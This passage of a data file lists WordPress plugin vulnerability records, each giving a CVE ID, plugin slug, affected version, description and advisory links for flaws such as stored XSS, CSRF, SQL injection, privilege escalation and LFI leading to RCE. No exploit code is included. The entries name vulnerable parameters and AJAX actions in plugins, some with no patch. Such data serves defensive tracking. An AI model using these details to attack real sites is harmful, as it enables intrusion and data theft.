replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e022febe-7295-493d-afa7-185f55b4d3b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e022febe-7295-493d-afa7-185f55b4d3b9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/admin\\\/settings.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/admin\\\/settings.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12606","slug":"ai-scribe-the-chatgpt-powered-seo-content-creation-wizard","versionImpact":"2.3","description":"The AI Scribe \u2013 SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the engine_request_data() function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L730\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L730\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bc4a765-719e-4e99-b7f3-d255e4c019f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bc4a765-719e-4e99-b7f3-d255e4c019f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1657","slug":"ulisting","versionImpact":"2.1.7","description":"The Directory Listings WordPress plugin \u2013 uListing plugin for WordPress is vulnerable to unauthorized modification of data and PHP Object Injection due to a missing capability check on the stm_listing_ajax AJAX action in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to update post meta data and inject PHP Objects that may be unserialized.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e70184f-94b6-4742-b99b-6eec9d28f17c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e70184f-94b6-4742-b99b-6eec9d28f17c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7230","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as admin to perform Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/402e428b-f966-4a36-ace0-d0ded9410b1d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/402e428b-f966-4a36-ace0-d0ded9410b1d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6055","slug":"zen-social-sticky","versionImpact":"0.3","description":"The Zen Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3. This is due to missing or incorrect nonce validation on the 'zen-social-sticky\/zen-sticky-social.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zen-social-sticky\\\/trunk\\\/zen-sticky-social.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zen-social-sticky\\\/trunk\\\/zen-sticky-social.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cfebae-bbf3-4b0b-9afc-3ef2548045e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cfebae-bbf3-4b0b-9afc-3ef2548045e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5754","slug":"useful-tab-block-responsive-amp-compatible","versionImpact":"1.3.2","description":"The Useful Tab Block \u2013 Responsive & AMP-Compatible plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/useful-tab-block-responsive-amp-compatible\\\/trunk\\\/dynamic.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/useful-tab-block-responsive-amp-compatible\\\/trunk\\\/dynamic.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/useful-tab-block-responsive-amp-compatible\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/useful-tab-block-responsive-amp-compatible\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56b637dc-4382-438f-ae36-e5075580a7d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56b637dc-4382-438f-ae36-e5075580a7d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0581","slug":"private-content","versionImpact":"8.4.3","description":"The PrivateContent plugin for WordPress is vulnerable to protection mechanism bypass due to the use of client side validation in versions up to, and including, 8.4.3. This is due to the plugin checking if an IP had been blocklist via client-side scripts rather than server-side. This makes it possible for unauthenticated attackers to bypass any login restrictions that may prevent a brute force attack.","refs":"[{\"url\":\"https:\\\/\\\/lcweb.it\\\/privatecontent\\\/changelog\",\"name\":\"https:\\\/\\\/lcweb.it\\\/privatecontent\\\/changelog\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de73304e-7a28-4304-b1ed-2f6dd7738236\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de73304e-7a28-4304-b1ed-2f6dd7738236\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25150","slug":"email-templates","versionImpact":"1.3.","description":"The Email Templates plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.3. This makes it possible for attackers to present phishing forms or conduct cross-site request forgery attacks against site administrators.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5c449f1-4715-4033-b0a3-6a8ca968aabc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5c449f1-4715-4033-b0a3-6a8ca968aabc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-templates\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-templates\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4634","slug":"media-library-assistant","versionImpact":"3.09","description":"The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~\/includes\/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/174508\\\/wpmla309-lfiexec.tgz\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/174508\\\/wpmla309-lfiexec.tgz\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Patrowl\\\/CVE-2023-4634\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/Patrowl\\\/CVE-2023-4634\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patrowl.io\\\/blog-wordpress-media-library-rce-cve-2023-4634\\\/\",\"name\":\"https:\\\/\\\/patrowl.io\\\/blog-wordpress-media-library-rce-cve-2023-4634\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35909","slug":"ninja-forms","versionImpact":"3.6.25","description":"Uncontrolled Resource Consumption vulnerability in Saturday Drive Ninja Forms Contact Form \u2013 The Drag and Drop Form Builder for WordPress leading to DoS.This issue affects Ninja Forms Contact Form \u2013 The Drag and Drop Form Builder for WordPress: from n\/a through 3.6.25.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-forms\\\/wordpress-ninja-forms-plugin-3-6-25-denial-of-service-attack-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-forms\\\/wordpress-ninja-forms-plugin-3-6-25-denial-of-service-attack-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2237","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Global Badge module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4375","slug":"master-slider","versionImpact":"3.9.10","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_layer' shortcode in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the 'css_id' user supplied attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35ead2b5-8b50-40e1-9b4a-547d97f34c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35ead2b5-8b50-40e1-9b4a-547d97f34c4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L817\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L817\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5881","slug":"webico-slider-flatsome-addons","versionImpact":"2.0.1","description":"The Webico Slider Flatsome Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wbc_image shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71eeddf4-5693-41bc-93ad-3c93dafdd3bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71eeddf4-5693-41bc-93ad-3c93dafdd3bc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webico-slider-flatsome-addons\\\/trunk\\\/shortcodes\\\/wbc_slider.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webico-slider-flatsome-addons\\\/trunk\\\/shortcodes\\\/wbc_slider.php#L4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9689","slug":"post-from-frontend","versionImpact":"1.0.0","description":"The Post From Frontend WordPress plugin through 1.0.0 does not have CSRF check when deleting posts, which could allow attackers to make logged in admin perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea501d37-1ec2-43ec-873a-ec204e965f60\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea501d37-1ec2-43ec-873a-ec204e965f60\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11784","slug":"ticketsource-events","versionImpact":"3.0.2","description":"The Sell Tickets Online \u2013 TicketSource Ticket Shop for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ticketshop' shortcode in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ticketsource-events\\\/trunk\\\/includes\\\/ticketsource-events-build.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ticketsource-events\\\/trunk\\\/includes\\\/ticketsource-events-build.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ticketsource-events\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ticketsource-events\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970826cf-316d-4fce-ac90-bf338c5ef3e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970826cf-316d-4fce-ac90-bf338c5ef3e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12473","slug":"ai-scribe-the-chatgpt-powered-seo-content-creation-wizard","versionImpact":"2.3","description":"The AI Scribe \u2013 SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to SQL Injection via the 'template_id' parameter of the 'article_builder_generate_data' shortcode in all versions up to, and including, 2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79125ac2-f3ed-40c9-a81b-340195fc8da5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79125ac2-f3ed-40c9-a81b-340195fc8da5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1653","slug":"ulisting","versionImpact":"2.1.7","description":"The Directory Listings WordPress plugin \u2013 uListing plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.7. This is due to the stm_listing_profile_edit AJAX action not having enough restriction on the user meta that can be updated. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181b26e-89c7-4020-a3d4-29bdc88d7438?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181b26e-89c7-4020-a3d4-29bdc88d7438?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3610","slug":"short-tax-post","versionImpact":"2.1.2","description":"The Reales WP STPT plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.1.2. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's passwords and email addresses, including administrators, and leverage that to gain access to their account. This can be combined with CVE-2025-3609 to achieve remote code execution as an originally unauthenticated user with no account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c6b149-39d7-491a-9f3a-261087a52a03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c6b149-39d7-491a-9f3a-261087a52a03?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7229","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d16f6ba0-a47d-413f-a6d4-058910441009\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d16f6ba0-a47d-413f-a6d4-058910441009\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6040","slug":"easy-flashcards","versionImpact":"0.1","description":"The Easy Flashcards plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1. This is due to missing or incorrect nonce validation on the 'ef_settings_submenu' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-flashcards\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-flashcards\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ff97ee8-9732-4d26-b5e8-b744730e9c5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ff97ee8-9732-4d26-b5e8-b744730e9c5a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5752","slug":"vertical-scroll-image-slideshow-gallery","versionImpact":"11.1","description":"The Vertical scroll image slideshow gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-scroll-image-slideshow-gallery\\\/trunk\\\/vertical-scroll-image-slideshow-gallery.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-scroll-image-slideshow-gallery\\\/trunk\\\/vertical-scroll-image-slideshow-gallery.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-scroll-image-slideshow-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-scroll-image-slideshow-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9abb15-f375-4dca-a998-e621d50fa273?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9abb15-f375-4dca-a998-e621d50fa273?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4779","slug":"user-submitted-posts","versionImpact":"20230811","description":"The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [usp_gallery] shortcode in versions up to, and including, 20230811 due to insufficient input sanitization and output escaping on user supplied attributes like 'before'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21ca709-183f-4dd1-849c-f1b2a4f7ec43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21ca709-183f-4dd1-849c-f1b2a4f7ec43?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961841\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961841\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35039","slug":"bdvs-password-reset","versionImpact":"0.0.15","description":"Improper Restriction of Excessive Authentication Attempts vulnerability in Be Devious Web Development Password Reset with Code for WordPress REST API allows Authentication Abuse.This issue affects Password Reset with Code for WordPress REST API: from n\/a through 0.0.15.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bdvs-password-reset\\\/wordpress-password-reset-with-code-for-wordpress-rest-api-plugin-0-0-15-privilege-escalation-due-to-weak-pin-generation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bdvs-password-reset\\\/wordpress-password-reset-with-code-for-wordpress-rest-api-plugin-0-0-15-privilege-escalation-due-to-weak-pin-generation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2194","slug":"wp-statistics","versionImpact":"14.5","description":"The WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL search parameter in all versions up to, and including, 14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4618","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.6","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Team Member widget in all versions up to, and including, 2.6.9.6 due to insufficient input sanitization and output escaping on user supplied 'url' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e82478c-e476-4cdf-ab72-f578331058e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e82478c-e476-4cdf-ab72-f578331058e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.6\\\/elements\\\/team-member\\\/team-member.php#L1696\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.6\\\/elements\\\/team-member\\\/team-member.php#L1696\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083582\\\/#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083582\\\/#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
